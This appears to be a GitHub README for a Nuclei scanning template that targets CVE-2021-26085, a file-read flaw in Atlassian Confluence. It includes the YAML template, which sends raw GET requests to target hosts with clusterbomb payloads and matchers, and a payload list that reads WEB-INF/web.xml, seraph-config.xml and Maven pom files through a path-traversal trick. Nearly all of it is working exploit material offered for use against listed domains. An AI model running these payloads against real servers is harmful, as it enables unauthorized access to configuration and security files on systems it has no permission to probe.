zeroc00I/CVE-2021-26085

CVE-2021-26085

Ideas from: https://github.com/ColdFusionX/CVE-2021-26085

Modifications from: my burp

https://twitter.com/zeroc00I

DISCLAIMER: List domains should end by "/"

confluence-CVE-2021-26085.yaml

id: confluence-lfi-fuzz

info:
  name: confluence-lfi-zeroc00I
  author: zeroc00I
  severity: high
  reference: lfi
  tags: lfi

attack: clusterbomb

requests:
  - payloads:
      path: confluence-lfi.txt
    raw:
      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "groupId>org.springframework"
        part: body
      - type: word
        words:
          - "Generated by Maven"
        part: body
      - type: word
        words:
          - "security-config"
        part: body
      - type: word
        words:
          - 'com.atlassian.confluence.setup'

confluence-lfi.txt

s/123cfx/_/;/WEB-INF/web.xml
s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml

Running Demo